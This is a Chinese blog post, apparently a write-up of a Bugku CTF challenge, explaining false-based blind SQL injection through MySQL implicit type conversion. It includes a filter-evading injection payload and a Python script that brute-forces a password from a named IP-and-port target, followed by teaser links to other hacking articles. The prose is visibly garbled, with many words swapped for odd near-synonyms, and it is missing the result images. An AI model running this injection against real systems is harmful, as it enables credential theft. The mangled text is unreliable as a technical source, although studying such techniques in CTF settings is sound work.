实例解说False盲注根底原理

访客5年前黑客文章1108

0×01 前语
false盲注有些时分能够绕过一些WAF,也是简略被忽视的细节。本文的意图在于经过做CTF的一起来学习注入原理,一起也运用到本身的才能。这儿仅仅简略说一些我自己的了解,或许网上有更好的思路和见地,都是值得学习的。
0×02 false注入原理
MYSQL的隐式类型转化,当字符串和数字比较时,会把字符串转为浮点数,而字符串转化时会发生一个warning,转化的成果为0,但假如字符串最初是数字话仍是会从数字部分切断,转化为数字


0×03 实例
举例地址为:
http://118.89.219.210:49167/index.php(Bugku)

填入username和password之后,Burp抓包,send to repeater剖析一下
发现过滤了挺多的,空格,%0a,/**/,and,union等等
可是 |(位或)&(位与)^(位异或)没有过滤掉
这儿的话应该来说都能够用,我试了一下|(位或)和 ^(位异或),这两个都是能够的
结构一个payload句子为:
username=admin’|(ascii(mid((password)from(1)))>53)#&password=sd
函数介绍:
MID(column_name,start[,length])   由于过滤掉空格的原因,才用上述格局
ASCII() 回来字符表达式最左端字符的ASCII 码值
当榜首字母的ascii码值为53的时分,右边的表明式则为false,与‘admin’ 或, 适当与   0 | 0 成果为0,当username=0时,回来查询字段的一切数据,(只需username没有以数字最初的)这儿留意 按位或的优先级高于=,所以是先按位或再赋值给username。
当然了,想结构为0的话不止只要位运算符,还有+号(‘ ’+‘ ’=0),  -号(‘ ‘-’ ‘=0), *号(‘ ‘*’ ‘=0),  /号(‘ ‘/1=0), %取余(‘ ‘%1=0)等等

能够先判别一下字段长度:


依据页面信息判别为32位
原理都讲得差不多了
能够自己手注,但好像太麻烦了
下面能够写一个Python脚本跑出来
import requests
url = "http://118.89.219.210:49167/index.php"
r = requests.Session()
result=''
for i in range(1,33):
 for j in range(37,127):
  payload = "admin'|(ascii(mid((password)from({0})))>{1})#".format(str(i),str(j))
  data={"username":payload,"password":"psdvs"}
  print payload
  html=r.post(url,data=data)
  if "password error" in html.content:
   result+=chr(j)
   print result
   break
print result
成果为:

 
 

相关文章

运营商互联网事务暴出面安全

关于一个战士来说,最大的愿望便是能上战场真刀实枪的干上一战,相同关于一名安全人员来说,自己规划、建造的通过层层防护的系统,假如没有经历过一次进犯,难免有点索然寡味。在许多的甲方傍边,运营商互联网事务暴...

恣意用户暗码重置(四):重置凭据未校验

在逻辑缝隙中,恣意用户暗码重置最为常见,或许出现在新用户注册页面,也或许是用户登录后重置暗码的页面,或许用户忘掉暗码时的暗码找回页面,其间,暗码找回功用是重灾区。我把日常浸透过程中遇到的事例作了缝隙成...

用于浸透测验WordPress的Ruby结构:WordPress Exploit Framework

这个Ruby结构包括一些能够浸透测验WordPress网站和体系的模块,用户也能够自己开发模块扩展其功用。 运转它需求什么条件? 保证体系上装置了Ruby 2.2.x,翻开一个指令行窗口,切换当时目录...

Django开发与攻防测验(入门篇)

最近在培训包含在一些竞赛中,python结构方面的攻防需求呈现的越来越频频。 尽管python结构相关于Java、php等的广泛度还略低一点(当然现在的盛行程度现已越来越高了),可是咱们并不能够因此而...

安全搜索引擎Shodan(搜蛋)命令行形式运用TIPS

与谷歌经过网址来搜索互联网的方法不同,Shodan经过互联网背面的通道来搜索信息。它就象是一种“漆黑”的谷歌,不断在寻觅服务器、网络摄像头、打印机、路由器和其他与互联网衔接及构成互联网的全部东西。 S...

运用 PtH 进犯 NTLM 认证的 Web 使用

本文具体介绍了在Windows/Active Directory环境中运用PtH进犯NTLM认证的web运用的具体进程。该技能细节来源于Alva ‘Skip’ Duckwall 和Chris Camp...